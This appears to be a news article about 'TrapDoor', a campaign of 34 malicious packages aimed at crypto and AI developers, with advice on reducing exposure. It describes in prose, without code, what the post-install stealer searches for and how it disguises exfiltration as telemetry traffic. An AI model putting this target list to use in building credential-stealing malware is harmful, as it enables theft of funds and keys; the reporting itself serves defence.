A supply chain campaign called TrapDoor is now circulating through public package registries, planting 34 malicious libraries aimed at crypto and AI developers. The payload looks for wallet files, SSH keys, and API credentials, then exfiltrates them within seconds of installation. Cointelegraph flagged the campaign on May 25, citing researcher analysis of the package set.
The combination matters because the same developer machine that holds a hot wallet or a hardware wallet bridge tool usually also holds exchange API keys, deployment credentials, and signing keys for smart contracts. A single compromised laptop can expose treasury wallets, validator keys, and CI/CD secrets in one pass.
The Attack Pattern
TrapDoor follows a familiar typosquatting and dependency confusion playbook. Attackers publish packages with names that mimic legitimate libraries used in crypto wallets, AI agents, and developer tooling. When a target installs the package, a post-install script runs in the background and quietly searches the home directory.
The script looks for a specific set of high value files:
- Wallet data from common desktop clients (keystore files, encrypted JSON wallets, browser extension storage paths)
- SSH private keys under the user's
.sshdirectory - Environment files containing exchange API keys, RPC endpoints, and cloud credentials
- Browser session data that can hijack already-authenticated web sessions
Collected data is bundled and sent to a remote endpoint. Some variants stage the exfiltration through legitimate looking telemetry hosts to bypass corporate firewalls and DNS blocklists. The whole sequence completes before most developers notice the install command has even returned.
Crypto Engineers Are A Bigger Target Than Banks
A traditional banking developer who loses their laptop creates an incident, but not an instant theft. Production systems sit behind multiple control gates: hardware tokens, separate environments, mandatory deploy approvals. Crypto engineering does not always work that way.
In crypto, the keys ARE the system. A leaked mnemonic gives the attacker the same rights as the legitimate signer with no rollback path. A leaked API key for a centralized exchange account can move funds in minutes. A leaked deployer key for a smart contract can ship a malicious upgrade before the team's Discord even sees the alert.
The Ronin bridge breach, the LastPass-linked compromises of 2023, and the more recent SwissBorg incident all started with credential theft on a developer or insider machine. TrapDoor sits squarely in this lineage.
Practical Steps For Developers Right Now
If you install JavaScript, Python, or Rust packages on the same machine where you sign transactions, treat this campaign as immediate exposure. A few measures cut the blast radius without changing daily workflow:
- Move signing to a dedicated device or hardware wallet. The compromised dev box should never be able to sign by itself.
- Stop pasting seed phrases into plaintext files. If a seed must live on disk for backup, encrypt it at rest with a passphrase that is not also in the same machine's password manager.
- Use scoped API keys with IP allowlists and withdrawal disabled. Exchange API keys with withdrawal rights should not exist outside of a sealed environment.
- Pin dependencies and read post-install scripts. Lockfiles plus a quick audit of new transitive dependencies catches most typosquats.
- Rotate SSH keys and any credentials that lived next to a hot wallet or AI agent project recently. The cost of rotation is hours; the cost of a stolen treasury is total.
For everyday crypto users who do not write code, the indirect risk is real too. If a wallet provider or DeFi protocol you use has engineers compromised, the attack surface shifts to product upgrades and signed releases. This is one of the reasons self-custody options that route through hardware wallets remain the safer default for meaningful balances, even when the daily user experience is rougher than a fully custodial app.
The Pattern Is Accelerating, Not Slowing
TrapDoor lands in a year where supply chain attacks on crypto have already produced multiple nine-figure incidents. The 2024 Ledger Connect Kit compromise, the recurring npm wallet drainers, and the AI agent token theft cluster of early 2026 all relied on the same basic technique: poison a dependency, wait for a developer to update, collect keys.
Package maintainers, registry operators, and security firms are responding with sandboxed install pipelines, mandatory two factor for publishers, and machine learning scanners. None of those defenses are universal yet. Until they are, the burden of caution sits with the developer pulling npm install at 2am to ship a feature.
Overview
TrapDoor is a 34 package supply chain campaign that targets crypto and AI developers by stealing wallet files, SSH keys, and API credentials within seconds of installation. The wider trend matters more than this single campaign: developer machines remain the soft underbelly of the crypto stack, and a compromise there often means direct loss of funds rather than just a recoverable incident. Engineers should move signing off shared devices, scope credentials tightly, and audit new dependencies before the next update window.
